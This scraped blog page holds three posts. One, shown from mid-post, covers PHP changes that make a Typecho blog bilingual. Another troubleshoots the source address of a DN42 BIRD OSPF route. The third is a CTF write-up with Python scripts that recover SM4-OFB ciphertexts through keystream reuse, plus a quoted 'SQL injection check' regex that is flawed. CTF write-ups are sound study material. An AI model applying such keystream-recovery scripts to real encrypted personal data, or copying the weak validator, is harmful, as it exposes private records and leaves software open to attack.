class="joe_dropdown__menu"> <?php // Get the current full URL $current_url = $_SERVER['REQUEST_URI']; $host = $_SERVER['HTTP_HOST']; // Check if there is an English prefix "/en/" if (strpos($current_url, '/en/') === 0) { $current_url = substr_replace($current_url, '', 0, 3); } $new_url_cn = 'https://' . $host . $current_url; $new_url_en = 'https://' . $host . '/en' . $current_url; // Generate the two hyperlinks echo '<a href="' . $new_url_cn . '">简体中文</a>'; echo '<a href="' . $new_url_en . '">English</a>'; ?> </nav> </div> This needs to be added to both the Chinese and English instances. After this, the language selector should be available globally. For the Joe theme I use, separate language selectors needed to be written for mobile and PC views. Modify the SiteMap Plugin To help search engines index the English pages faster, I decided to modify the SiteMap plugin to include the English site's pages. There are two types of sitemaps: sitemapindex (for indexing sub-sitemaps) and urlset (for containing page URLs). I use the joyqi/typecho-plugin-sitemap plugin. Based on this, I changed the default /sitemap.xml to a sitemapindex, created a new route /sitemap_cn.xml to hold the Chinese site's sitemap, left the English site's plugin unchanged (its sitemap remains at /en/sitemap.xml), and had the main index sitemap reference both /sitemap_cn.xml and /en/sitemap.xml. Modify the SiteMap's Plugin.php: /** * Activate plugin method, if activated failed, throw exception will disable this plugin. */ public static function activate() { Helper::addRoute( - 'sitemap', + 'sitemap_index', '/sitemap.xml', Generator::class, - 'generate', + 'generate_index', 'index' ); + Helper::addRoute( + 'sitemap_cn', + '/sitemap_cn.xml', + Generator::class, + 'generate_cn', + 'index' + ); } /** * Deactivate plugin method, if deactivated failed, throw exception will enable this plugin. */ public static function deactivate() { - Helper::removeRoute('sitemap'); + Helper::removeRoute('sitemap_index'); + Helper::removeRoute('sitemap_cn'); } {collapse} {collapse-item label="Complete code"} <?php namespace TypechoPlugin\Sitemap; use Typecho\Plugin\PluginInterface; use Typecho\Widget\Helper\Form; use Utils\Helper; if (!defined('__TYPECHO_ROOT_DIR__')) { exit; } /** * Plugin to automatically generate a sitemap for Typecho. * The sitemap URL is: http(s)://yourdomain.com/sitemap.xml * * @package Sitemap Plugin * @author joyqi * @version 1.0.0 * @since 1.2.1 * @link https://github.com/joyqi/typecho-plugin-sitemap */ class Plugin implements PluginInterface { /** * Activate plugin method, if activated failed, throw exception will disable this plugin. */ public static function activate() { Helper::addRoute( 'sitemap_index', '/sitemap.xml', Generator::class, 'generate_index', 'index' ); Helper::addRoute( 'sitemap_cn', '/sitemap_cn.xml', Generator::class, 'generate_cn', 'index' ); } /** * Deactivate plugin method, if deactivated failed, throw exception will enable this plugin. */ public static function deactivate() { Helper::removeRoute('sitemap_index'); Helper::removeRoute('sitemap_cn'); } /** * Plugin config panel render method. * * @param Form $form */ public static function config(Form $form) { $sitemapBlock = new Form\Element\Checkbox( 'sitemapBlock', [ 'posts' => _t('Generate post links'), 'pages' => _t('Generate page links'), 'categories' => _t('Generate category links'), 'tags' => _t('Generate tag links'), ], ['posts', 'pages', 'categories', 'tags'], _t('Sitemap Display') ); $updateFreq = new Form\Element\Select( 'updateFreq', [ 'daily' => _t('Daily'), 'weekly' => _t('Weekly'), 'monthly' => _t('Monthly or less often'), ], 'daily', _t('Update Frequency') ); // $externalSitemap = new Typecho_Widget_Helper_Form_Element_Text('externalSitemap', NULL, '', _t('Additional Sitemap')); $form->addInput($sitemapBlock->multiMode()); $form->addInput($updateFreq); // $form->addInput($externalSitemap); } /** * Plugin personal config panel render method. * * @param Form $form */ public static function personalConfig(Form $form) { // TODO: Implement personalConfig() method. } } {/collapse-item} {/collapse} Modify the SiteMap's Generator.php: class Generator extends Contents { + public function generate_index(){ + $sitemap = '<?xml version="1.0" encoding="UTF-8"?> +<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> + <sitemap> + <loc>https://www.iyoroy.cn/sitemap_cn.xml</loc> + </sitemap> + <sitemap> + <loc>https://www.iyoroy.cn/en/sitemap.xml</loc> + </sitemap> +</sitemapindex>'; + $this->response->throwContent($sitemap, 'text/xml'); + } + /** * @return void */ - public function generate() + public function generate_cn() { $sitemap = '<?xml version="1.0" encoding="' . $this->options->charset . '"?>' . PHP_EOL; ... {collapse} {collapse-item label="Complete code"} <?php namespace TypechoPlugin\Sitemap; use Widget\Base\Contents; use Widget\Contents\Page\Rows; use Widget\Contents\Post\Recent; use Widget\Metas\Category\Rows as CategoryRows; use Widget\Metas\Tag\Cloud; if (!defined('__TYPECHO_ROOT_DIR__')) { exit; } /** * Sitemap Generator */ class Generator extends Contents { public function generate_index(){ $sitemap = '<?xml version="1.0" encoding="UTF-8"?> <sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <sitemap> <loc>https://www.iyoroy.cn/sitemap_cn.xml</loc> </sitemap> <sitemap> <loc>https://www.iyoroy.cn/en/sitemap.xml</loc> </sitemap> </sitemapindex>'; $this->response->throwContent($sitemap, 'text/xml'); } /** * @return void */ public function generate_cn() { $sitemap = '<?xml version="1.0" encoding="' . $this->options->charset . '"?>' . PHP_EOL; $sitemap .= '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"' . ' xmlns:news="http://www.google.com/schemas/sitemap-news/0.9"' . ' xmlns:xhtml="http://www.w3.org/1999/xhtml"' . ' xmlns:image="http://www.google.com/schemas/sitemap-image/1.1"' . ' xmlns:video="http://www.google.com/schemas/sitemap-video/1.1">' . PHP_EOL; // add homepage $sitemap .= <<<EOF <url> <loc>{$this->options->siteUrl}</loc> <changefreq>daily</changefreq> <priority>1.0</priority> </url> EOF; // add posts if (in_array('posts', $this->options->plugin('Sitemap')->sitemapBlock)) { $postsCount = $this->size($this->select() ->where('table.contents.status = ?', 'publish') ->where('table.contents.created < ?', $this->options->time) ->where('table.contents.type = ?', 'post')); $posts = Recent::alloc(['pageSize' => $postsCount]); $freq = $this->options->plugin('Sitemap')->updateFreq ==='monthly' ? 'monthly' : 'weekly'; while ($posts->next()) { $sitemap .= <<<EOF <url> <loc>{$posts->permalink}</loc> <changefreq>{$freq}</changefreq> <lastmod>{$posts->date->format('c')}</lastmod> <priority>0.8</priority> </url> EOF; } } // add pages if (in_array('pages', $this->options->plugin('Sitemap')->sitemapBlock)) { $pages = Rows::alloc(); $freq = $this->options->plugin('Sitemap')->updateFreq ==='monthly' ? 'yearly' : 'monthly'; while ($pages->next()) { $sitemap .= <<<EOF <url> <loc>{$pages->permalink}</loc> <changefreq>{$freq}</changefreq> <lastmod>{$pages->date->format('c')}</lastmod> <priority>0.5</priority> </url> EOF; } } // add categories if (in_array('categories', $this->options->plugin('Sitemap')->sitemapBlock)) { $categories = CategoryRows::alloc(); $freq = $this->options->plugin('Sitemap')->updateFreq; while ($categories->next()) { $sitemap .= <<<EOF <url> <loc>{$categories->permalink}</loc> <changefreq>{$freq}</changefreq> <priority>0.6</priority> </url> EOF; } } // add tags if (in_array('tags', $this->options->plugin('Sitemap')->sitemapBlock)) { $tags = Cloud::alloc(); $freq = $this->options->plugin('Sitemap')->updateFreq; while ($tags->next()) { $sitemap .= <<<EOF <url> <loc>{$tags->permalink}</loc> <changefreq>{$freq}</changefreq> <priority>0.4</priority> </url> EOF; } } $sitemap .= '</urlset>'; $this->response->throwContent($sitemap, 'text/xml'); } } {/collapse-item} {/collapse} Please replace the blog URL in the code with your own. (I was too busy recently to create a separate configuration page, so I hardcoded the Sitemap URLs into the plugin for now.) Disable and then re-enable the plugin. Visiting https://<host>/sitemap.xml should now show the sitemap index: <sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <sitemap> <loc>https://www.iyoroy.cn/sitemap_cn.xml</loc> </sitemap> <sitemap> <loc>https://www.iyoroy.cn/en/sitemap.xml</loc> </sitemap> </sitemapindex> You should also be able to see that search engines like Bing Webmaster Tools have detected the English site's sitemap: Add hreflang This step informs search engines that the current page has multi-language versions, allowing them to show the appropriate page based on user language preference or location. We need to insert link tags like the following format within the <head></head> section: <link rel="alternate" hreflang="en-us" href="https://example.com/us"> <link rel="alternate" hreflang="fr" href="https://example.com/fr"> <link rel="alternate" hreflang="x-default" href="https://example.com/default"> Here, hreflang="x-default" indicates the default language for the page. The value of hreflang is composed of an ISO 639-1 language code and an optional ISO 3166-1 Alpha-2 region code (e.g., distinguishing between en, en-US and en-UK). Add the following content to the relevant section of your theme's <head></head>: <?php // Get the current full URL $current_url = $_SERVER['REQUEST_URI']; $host = $_SERVER['HTTP_HOST']; // Check if there is an English prefix "/en/" if (strpos($current_url, '/en/') === 0) { $current_url = substr_replace($current_url, '', 0, 3); } $new_url_cn = 'https://' . $host . $current_url; $new_url_en = 'https://' . $host . '/en' . $current_url; // Generate the link tags echo '<link rel="alternate" hreflang="zh-cn" href="'.$new_url_cn.'" />'; echo '<link rel="alternate" hreflang="en-us" href="'.$new_url_en.'" />'; echo '<link rel="alternate" hreflang="x-default" href="'.$new_url_cn.'" />'; ?> This needs to be added to both the Chinese and English sites. After this, you should find the corresponding hreflang configuration in the <head> section of your website pages. Sync Like Counts and View Counts This step is highly theme-dependent and might not apply to all themes. I use the Joe theme, which handles reading and writing like counts and view counts to the database directly. I modified the English instance's theme code to read and write these values directly from/to the Chinese instance's database. Modify the function that retrieves view counts in <webroot>/en/usr/themes/Joe/core/function.php: /* Query Post Views */ function _getViews($item, $type = true) { - $db = Typecho_Db::get(); + // $db = Typecho_Db::get(); + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho' + ], Typecho_Db::READ | Typecho_Db::WRITE); $result = $db->fetchRow($db->select('views')->from('table.contents')->where('cid = ?', $item->cid))['views']; if ($type) echo number_format($result); else return number_format($result); } Modify the function that retrieves like counts in <webroot>/en/usr/themes/Joe/core/function.php: /* Query Post Like Count */ function _getAgree($item, $type = true) { - $db = Typecho_Db::get(); + // $db = Typecho_Db::get(); + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho' + ], Typecho_Db::READ | Typecho_Db::WRITE); $result = $db->fetchRow($db->select('agree')->from('table.contents')->where('cid = ?', $item->cid))['agree']; if ($type) echo number_format($result); else return number_format($result); } Modify the code displaying view counts on the homepage in <webroot>/en/usr/themes/Joe/core/route.php: $result[] = array( "mode" => $item->fields->mode ? $item->fields->mode : 'default', "image" => _getThumbnails($item), "time" => date('Y-m-d', $item->created), "created" => date('d/m/Y', $item->created), "title" => $item->title, "abstract" => _getAbstract($item, false), "category" => $item->categories, - "views" => number_format($item->views), + // "views" => number_format($item->views), + "views" => _getViews($item, false), "commentsNum" => number_format($item->commentsNum), - "agree" => number_format($item->agree), + // "agree" => number_format($item->agree), + "agree" => _getAgree($item, false), "permalink" => $item->permalink, "lazyload" => _getLazyload(false), "type" => "normal" ); The code displaying view counts on the article page itself already uses _getViews, so it doesn't need modification. Modify the code that increments view counts: /* Increase View Count - Tested √ */ function _handleViews($self) { $self->response->setStatus(200); $cid = $self->request->cid; /* SQL injection check */ if (!preg_match('/^\d+$/', $cid)) { return $self->response->throwJson(array("code" => 0, "data" => "Illegal request! Blocked!")); } - $db = Typecho_Db::get(); + // $db = Typecho_Db::get(); + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho' + ], Typecho_Db::READ | Typecho_Db::WRITE); $row = $db->fetchRow($db->select('views')->from('table.contents')->where('cid = ?', $cid)); if (sizeof($row) > 0) { Modify the code for liking and unliking: /* Like and Unlike - Tested √ */ function _handleAgree($self) { $self->response->setStatus(200); $cid = $self->request->cid; $type = $self->request->type; /* SQL injection check */ if (!preg_match('/^\d+$/', $cid)) { return $self->response->throwJson(array("code" => 0, "data" => "Illegal request! Blocked!")); } /* SQL injection check */ if (!preg_match('/^[agree|disagree]+$/', $type)) { return $self->response->throwJson(array("code" => 0, "data" => "Illegal request! Blocked!")); } - $db = Typecho_Db::get(); + // $db = Typecho_Db::get(); + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho' + ], Typecho_Db::READ | Typecho_Db::WRITE); $row = $db->fetchRow($db->select('agree')->from('table.contents')->where('cid = ?', $cid)); if (sizeof($row) > 0) { After making these changes and saving, visiting the English site should show view counts and like counts synchronized with the Chinese site. Sync Comments I initially thought about creating a plugin that hooks into the comment submission function to simultaneously insert comment data into the other instance's database. However, I found that my Joe theme already hooks into this, and adding another hook might cause conflicts. Therefore, I directly edited the Joe theme's code. Edit <webroot>/index/usr/themes/Joe/core/factory.php: <?php require_once("phpmailer.php"); require_once("smtp.php"); /* Enhanced Comment Interception */ Typecho_Plugin::factory('Widget_Feedback')->comment = array('Intercept', 'message'); class Intercept { public static function message($comment) { ... Typecho_Cookie::delete('__typecho_remember_text'); + + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho_en', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho_en' + ], Typecho_Db::READ | Typecho_Db::WRITE); + + $row = [ + 'coid' => $comment['coid'], // Must include the newly generated comment ID + 'cid' => $comment['cid'], + 'created' => $comment['created'], + 'author' => $comment['author'], + 'authorId' => $comment['authorId'], + 'ownerId' => $comment['ownerId'], + 'mail' => $comment['mail'], + 'url' => $comment['url'], + 'ip' => $comment['ip'], + 'agent' => $comment['agent'], + 'text' => $comment['text'], + 'type' => $comment['type'], + 'status' => $comment['status'], + 'parent' => $comment['parent'] + ]; + + // Insert data into the target database's `comments` table + $db->query($db->insert('typecho_comments')->rows($row)); return $comment; } } ... Perform the same operation on the English instance, inserting comments into the Chinese database. One issue with this scheme is that if you need to delete spam comments, you must delete them separately in both instances. I'll fix that later (maybe). Reference: typecho/languages - GitHub
19/11/2025
141 Views
0 Comments
1 Stars
DN42&OneManISP - Troubleshooting OSPF Source Address in a Coexistence Environment
Backstory As mentioned in the previous post of this series, because the VRF solution was too isolating, the DNS service I deployed on the HKG node (172.20.234.225) became inaccessible from the DN42 network. Research indicated this could be achieved by setting up veth or NAT forwarding, but due to the scarcity of available documentation, I ultimately abandoned the VRF approach. Structure Analysis This time, I planned to place both DN42 and clearnet BGP routes into the system's main routing table, then separate them for export using filters to distinguish which should be exported. For clarity, I stored the configuration for the DN42 part and the clearnet part (hereinafter referred to as inet) separately, and then included them from the main configuration file. Also, since there should ideally only be one kernel configuration per routing table, I merged the DN42 and inet kernel parts, keeping only one instance. After multiple optimizations and revisions, my final directory structure is as follows: /etc/bird/ ├─envvars ├─bird.conf: Main Bird config file, defines basic info (ASN, IP, etc.), includes sub-configs below ├─kernel.conf: Kernel config, imports routes into the system routing table ├─dn42 | ├─defs.conf: DN42 function definitions, e.g., is_self_dn42_net() | ├─ibgp.conf: DN42 iBGP template | ├─rpki.conf: DN42 RPKI route validation | ├─ospf.conf: DN42 OSPF internal network | ├─static.conf: DN42 static routes | ├─ebgp.conf: DN42 Peer template | ├─ibgp | | └<ibgp configs>: DN42 iBGP configs for each node | ├─ospf | | └backbone.conf: OSPF area | ├─peers | | └<ibgp configs>: DN42 Peer configs for each node ├─inet | ├─peer.conf: Clearnet Peer | ├─ixp.conf: Clearnet IXP connection | ├─defs.conf: Clearnet function definitions, e.g., is_self_inet_v6() | ├─upstream.conf: Clearnet upstream | └static.conf: Clearnet static routes I separated the function definitions because I needed to reference them in the filters within kernel.conf, so I isolated them for early inclusion. After filling in the respective configurations and setting up the include relationships, I ran birdc configure and it started successfully. So, case closed... right? Problems occurred After running for a while, I suddenly found that I couldn't ping the HKG node from my internal devices, nor could I ping my other internal nodes from the HKG node. Strangely, external ASes could ping my other nodes or other external ASes through my HKG node, and my internal nodes could also ping other non-directly connected nodes (e.g., 226(NKG)->225(HKG)->229(LAX)) via the HKG node. Using ip route get <other internal node address> revealed: root@iYoRoyNetworkHKG:/etc/bird# ip route get 172.20.234.226 172.20.234.226 via 172.20.234.226 dev dn42_nkg src 23.149.120.51 uid 0 cache See the problem? The src address should have been the HKG node's own DN42 address (configured on the OSPF stub interface), but here it showed the HKG node's clearnet address instead. Attempting to read the route learned by Bird using birdc s r for 172.20.234.226: root@iYoRoyNetworkHKGBGP:/etc/bird/dn42/ospf# birdc s r for 172.20.234.226 BIRD 2.17.1 ready. Table master4: 172.20.234.226/32 unicast [dn42_ospf_iyoroynet_v4 00:30:29.307] * I (150/50) [172.20.234.226] via 172.20.234.226 on dn42_nkg onlink Looks seemingly normal...? Theoretically, although the DN42 source IP is different from the usual, DN42 rewrites krt_prefsrc when exporting to the kernel to inform the kernel of the correct source address, so this issue shouldn't occur: protocol kernel kernel_v4{ ipv4 { import none; export filter { if source = RTS_STATIC then reject; + if is_valid_dn42_network() then krt_prefsrc = DN42_OWNIP; accept; }; }; } protocol kernel kernel_v6 { ipv6 { import none; export filter { if source = RTS_STATIC then reject; + if is_valid_dn42_network_v6() then krt_prefsrc = DN42_OWNIPv6; accept; }; }; } Regarding krt_prefsrc, it stands for Kernel Route Preferred Source. This attribute doesn't manipulate the route directly but instead attaches a piece of metadata to it. This metadata directly instructs the Linux kernel to prioritize the specified IP address as the source address for packets sent via this route. I was stuck on this for a long time. The Solution Finally, during an unintentional attempt, I added the krt_prefsrc rewrite to the OSPF import configuration as well: protocol ospf v3 dn42_ospf_iyoroynet_v4 { router id DN42_OWNIP; ipv4 { - import where is_self_dn42_net() && source != RTS_BGP; + import filter { + if is_self_dn42_net() && source != RTS_BGP then { + krt_prefsrc=DN42_OWNIP; + accept; + } + reject; + }; export where is_self_dn42_net() && source != RTS_BGP; }; include "ospf/*"; }; protocol ospf v3 dn42_ospf_iyoroynet_v6 { router id DN42_OWNIP; ipv6 { - import where is_self_dn42_net_v6() && source != RTS_BGP; + import filter { + if is_self_dn42_net_v6() && source != RTS_BGP then { + krt_prefsrc=DN42_OWNIPv6; + accept; + } + reject; + }; export where is_self_dn42_net_v6() && source != RTS_BGP; }; include "ospf/*"; }; After running this, the src address became correct, and mutual pinging worked. Configuration files for reference: KaguraiYoRoy/Bird2-Configuration
29/10/2025
92 Views
0 Comments
1 Stars
2025 Yangcheng Cup CTF Preliminary WriteUp
GD1 The file description indicates this is a game developed with Godot Engine. Using GDRE tools to open it, we can locate the game logic: extends Node @export var mob_scene: PackedScene var score var a = "000001101000000001100101000010000011000001100111000010000100000001110000000100100011000100100000000001100111000100010111000001100110000100000101000001110000000010001001000100010100000001000101000100010111000001010011000010010111000010000000000001010000000001000101000010000001000100000110000100010101000100010010000001110101000100000111000001000101000100010100000100000100000001001000000001110110000001111001000001000101000100011001000001010111000010000111000010010000000001010110000001101000000100000001000010000011000100100101" func _ready(): pass func _process(delta: float) -> void : pass func game_over(): $ScoreTimer.stop() $MobTimer.stop() $HUD.show_game_over() func new_game(): score = 0 $Player.start($StartPosition.position) $StartTimer.start() $HUD.update_score(score) $HUD.show_message("Get Ready") get_tree().call_group("mobs", "queue_free") func _on_mob_timer_timeout(): var mob = mob_scene.instantiate() var mob_spawn_location = $MobPath / MobSpawnLocation mob_spawn_location.progress_ratio = randf() var direction = mob_spawn_location.rotation + PI / 2 mob.position = mob_spawn_location.position direction += randf_range( - PI / 4, PI / 4) mob.rotation = direction var velocity = Vector2(randf_range(150.0, 250.0), 0.0) mob.linear_velocity = velocity.rotated(direction) add_child(mob) func _on_score_timer_timeout(): score += 1 $HUD.update_score(score) if score == 7906: var result = "" for i in range(0, a.length(), 12): var bin_chunk = a.substr(i, 12) var hundreds = bin_chunk.substr(0, 4).bin_to_int() var tens = bin_chunk.substr(4, 4).bin_to_int() var units = bin_chunk.substr(8, 4).bin_to_int() var ascii_value = hundreds * 100 + tens * 10 + units result += String.chr(ascii_value) $HUD.show_message(result) func _on_start_timer_timeout(): $MobTimer.start() $ScoreTimer.start() We discover that when the score reaches 7906, a decryption algorithm is triggered to decrypt data from array a and print it. We wrote a decryption program following this logic: #include <iostream> #include <string> #include <bitset> using namespace std; int bin_to_int(const string &bin) { return stoi(bin, nullptr, 2); } string decodeBinaryString(const string &a) { string result; for (size_t i = 0; i + 12 <= a.length(); i += 12) { string bin_chunk = a.substr(i, 12); int hundreds = bin_to_int(bin_chunk.substr(0, 4)); int tens = bin_to_int(bin_chunk.substr(4, 4)); int units = bin_to_int(bin_chunk.substr(8, 4)); int ascii_value = hundreds * 100 + tens * 10 + units; result.push_back(static_cast<char>(ascii_value)); } return result; } int main() { string a = "000001101000000001100101000010000011000001100111000010000100000001110000000100100011000100100000000001100111000100010111000001100110000100000101000001110000000010001001000100010100000001000101000100010111000001010011000010010111000010000000000001010000000001000101000010000001000100000110000100010101000100010010000001110101000100000111000001000101000100010100000100000100000001001000000001110110000001111001000001000101000100011001000001010111000010000111000010010000000001010110000001101000000100000001000010000011000100100101"; cout << decodeBinaryString(a) << endl; return 0; } Execution yields the Flag: DASCTF{xCuBiFYr-u5aP2-QjspKk-rh0LO-w9WZ8DeS} 成功男人背后的女人 (The Woman Behind the Successful Man) Opening the attachment reveals an image. Based on the hint, we suspected hidden images or other content. Initial attempts with binwalk and foremost yielded nothing. Research indicated the use of Adobe Fireworks' proprietary protocol. Opening the image with appropriate tools revealed the hidden content: The symbols at the bottom were combined in binary form: 01000100010000010101001101000011 01010100010001100111101101110111 00110000011011010100010101001110 01011111011000100110010101101000 00110001011011100100010001011111 01001101010001010110111001111101 Decoding in 8-bit groups: #include <iostream> #include <string> using namespace std; int main(){ string str="010001000100000101010011010000110101010001000110011110110111011100110000011011010100010101001110010111110110001001100101011010000011000101101110010001000101111101001101010001010110111001111101"; for(int i=0;i<str.length();i+=8){ cout<<(char)stoi(str.substr(i,8).c_str(),nullptr,2); } return 0; } Execution yields: DASCTF{w0mEN_beh1nD_MEn} SM4-OFB We had AI analyze the encryption process and write a decryption script: # 使用此代码进行本地运行或在本环境运行来恢复密文(SM4-OFB 假设下) # 代码会: # 1) 使用已知 record1 的明文和密文计算每个分块的 keystream(假设使用 PKCS#7 填充到 16 字节并且每个字段单独以 OFB 从相同 IV 开始) # 2) 用得到的 keystream 去解 record2 对应字段的密文,尝试去掉填充并输出明文(UTF-8 解码) # # 说明:此脚本**不需要密钥**,只利用了已知明文与相同 IV/模式复用导致的 keystream 可重用性(这是 OFB/CTR 的典型弱点) # 请确保安装 pycryptodome(如果需要对照加密进行验证),但此脚本只做异或操作,不调用加密库。 from binascii import unhexlify, hexlify from Crypto.Util.Padding import pad, unpad def xor_bytes(a,b): return bytes(x^y for x,y in zip(a,b)) # record1 已知明文与密文(用户提供) record1 = { "name_plain": "蒋宏玲".encode('utf-8'), "name_cipher_hex": "cef18c919f99f9ea19905245fae9574e", "phone_plain": "17145949399".encode('utf-8'), "phone_cipher_hex": "17543640042f2a5d98ae6c47f8eb554c", "id_plain": "220000197309078766".encode('utf-8'), "id_cipher_hex": "1451374401262f5d9ca4657bcdd9687eac8baace87de269e6659fdbc1f3ea41c", "iv_hex": "6162636465666768696a6b6c6d6e6f70" } # record2 仅密文(用户提供) record2 = { "name_cipher_hex": "c0ffb69293b0146ea19d5f48f7e45a43", "phone_cipher_hex": "175533440427265293a16447f8eb554c", "id_cipher_hex": "1751374401262f5d9ca36576ccde617fad8baace87de269e6659fdbc1f3ea41c", "iv_hex": "6162636465666768696a6b6c6d6e6f70" } BS = 16 # 分组长度 # 工具:把字段按 16 字节块切分 def split_blocks(b): return [b[i:i+BS] for i in range(0, len(b), BS)] # 1) 计算 record1 每个字段的 keystream(假设加密前用 PKCS#7 填充,然后按块 XOR) ks_blocks = {"name": [], "phone": [], "id": []} # name C_name = unhexlify(record1["name_cipher_hex"]) P_name_padded = pad(record1["name_plain"], BS) for c, p in zip(split_blocks(C_name), split_blocks(P_name_padded)): ks_blocks["name"].append(xor_bytes(c, p)) # phone C_phone = unhexlify(record1["phone_cipher_hex"]) P_phone_padded = pad(record1["phone_plain"], BS) for c, p in zip(split_blocks(C_phone), split_blocks(P_phone_padded)): ks_blocks["phone"].append(xor_bytes(c, p)) # id (可能为两块) C_id = unhexlify(record1["id_cipher_hex"]) P_id_padded = pad(record1["id_plain"], BS) for c, p in zip(split_blocks(C_id), split_blocks(P_id_padded)): ks_blocks["id"].append(xor_bytes(c, p)) print("Derived keystream blocks (hex):") for field, blks in ks_blocks.items(): print(field, [b.hex() for b in blks]) # 2) 使用上述 keystream 去解 record2 相应字段 def recover_field(cipher_hex, ks_list): C = unhexlify(cipher_hex) blocks = split_blocks(C) recovered_padded = b''.join(xor_bytes(c, ks) for c, ks in zip(blocks, ks_list)) # 尝试去除填充并解码 try: recovered = unpad(recovered_padded, BS).decode('utf-8') except Exception as e: recovered = None return recovered, recovered_padded name_rec, name_padded = recover_field(record2["name_cipher_hex"], ks_blocks["name"]) phone_rec, phone_padded = recover_field(record2["phone_cipher_hex"], ks_blocks["phone"]) id_rec, id_padded = recover_field(record2["id_cipher_hex"], ks_blocks["id"]) print("\nRecovered (if OFB with same IV/key and per-field restart):") print("Name padded bytes (hex):", name_padded.hex()) print("Name plaintext:", name_rec) print("Phone padded bytes (hex):", phone_padded.hex()) print("Phone plaintext:", phone_rec) print("ID padded bytes (hex):", id_padded.hex()) print("ID plaintext:", id_rec) # 如果解码失败,打印原始 bytes 以便人工分析 # if name_rec is None: # print("\nName padded bytes (raw):", name_padded) # if phone_rec is None: # print("Phone padded bytes (raw):", phone_padded) # if id_rec is None: # print("ID padded bytes (raw):", id_padded) # 结束 We found that names and ID numbers could be computed. After dumping all names from the Excel sheet into a text file, we had AI write a batch processing script: #!/usr/bin/env python3 """ Batch-decrypt names encrypted with SM4-OFB where the same IV/nonce was reused and one known plaintext/ciphertext pair is available (from record1). This script: - Reads an input file (one hex-encoded cipher per line). - Uses the known record1 name plaintext & ciphertext to derive the OFB keystream blocks for the name-field (keystream = C XOR P_padded). - XORs each input cipher with the derived keystream blocks to recover plaintext, removes PKCS#7 padding if present, and prints a line containing: <recovered_name>\t<cipher_hex> Usage: python3 sm4_ofb_batch_decrypt_names.py names_cipher.txt Notes: - This assumes each name was encrypted as a separate field starting OFB from the same IV (so keystream blocks align for the name-field) and PKCS#7 padding was used before encryption. If names exceed the number of derived keystream blocks the script will attempt to reuse the keystream cyclically (warns about it), but ideally you should supply a longer known plaintext/ciphertext pair to derive more keystream blocks. - Requires pycryptodome for padding utilities: pip install pycryptodome Edit the KNOWN_* constants below if your known record1 values differ. """ import sys from binascii import unhexlify, hexlify from Crypto.Util.Padding import pad, unpad # ----------------------- # ----- KNOWN VALUES ---- # ----------------------- # These are taken from the CTF prompt / earlier messages. Change them if needed. KNOWN_NAME_PLAIN = "蒋宏玲" # record1 known plaintext for name field KNOWN_NAME_CIPHER_HEX = "cef18c919f99f9ea19905245fae9574e" # record1 name ciphertext hex IV_HEX = "6162636465666768696a6b6c6d6e6f70" # the IV column (fixed) # Block size for SM4 (16 bytes) BS = 16 # ----------------------- # ----- Helpers --------- # ----------------------- def xor_bytes(a: bytes, b: bytes) -> bytes: return bytes(x ^ y for x, y in zip(a, b)) def split_blocks(b: bytes, bs: int = BS): return [b[i:i+bs] for i in range(0, len(b), bs)] # ----------------------- # ----- Derive keystream from the known pair # ----------------------- def derive_keystream_from_known(known_plain: str, known_cipher_hex: str): p = known_plain.encode('utf-8') c = unhexlify(known_cipher_hex) p_padded = pad(p, BS) p_blocks = split_blocks(p_padded) c_blocks = split_blocks(c) if len(p_blocks) != len(c_blocks): raise ValueError('Known plaintext/cipher block count mismatch') ks_blocks = [xor_bytes(cb, pb) for cb, pb in zip(c_blocks, p_blocks)] return ks_blocks # ----------------------- # ----- Recovery -------- # ----------------------- def recover_name_from_cipher_hex(cipher_hex: str, ks_blocks): c = unhexlify(cipher_hex.strip()) c_blocks = split_blocks(c) # If there are more cipher blocks than ks_blocks, warn and reuse ks cyclically if len(c_blocks) > len(ks_blocks): print("[WARN] cipher needs %d blocks but only %d keystream blocks available; reusing keystream cyclically" % (len(c_blocks), len(ks_blocks)), file=sys.stderr) recovered_blocks = [] for i, cb in enumerate(c_blocks): ks = ks_blocks[i % len(ks_blocks)] recovered_blocks.append(xor_bytes(cb, ks)) recovered_padded = b''.join(recovered_blocks) # Try to unpad and decode; if fails, return hex of raw bytes try: recovered = unpad(recovered_padded, BS).decode('utf-8') except Exception: try: recovered = recovered_padded.decode('utf-8') except Exception: recovered = '<raw:' + recovered_padded.hex() + '>' return recovered # ----------------------- # ----- Main ----------- # ----------------------- def main(): if len(sys.argv) != 2: print('Usage: python3 sm4_ofb_batch_decrypt_names.py <names_cipher_file>', file=sys.stderr) sys.exit(2) inpath = sys.argv[1] ks_blocks = derive_keystream_from_known(KNOWN_NAME_PLAIN, KNOWN_NAME_CIPHER_HEX) with open(inpath, 'r', encoding='utf-8') as f: for lineno, line in enumerate(f, 1): line = line.strip() if not line: continue # Assume each line is one hex-encoded name ciphertext (no spaces) try: recovered = recover_name_from_cipher_hex(line, ks_blocks) except Exception as e: recovered = '<error: %s>' % str(e) print(f"{recovered}\t{line}") if __name__ == '__main__': main() Searching revealed that the ciphertext corresponding to 何浩璐 was c2de929284bff9f63b905245fae9574e. Searching for the ID number ciphertext corresponding to this in Excel yielded: 1751374401262f5d9ca36576ccde617fad8baace87de269e6659fdbc1f3ea41c. Decrypting this with the above script gave: 120000197404101676. Calculating its MD5: fbb80148b75e98b18d65be446f505fcc gives the Flag. 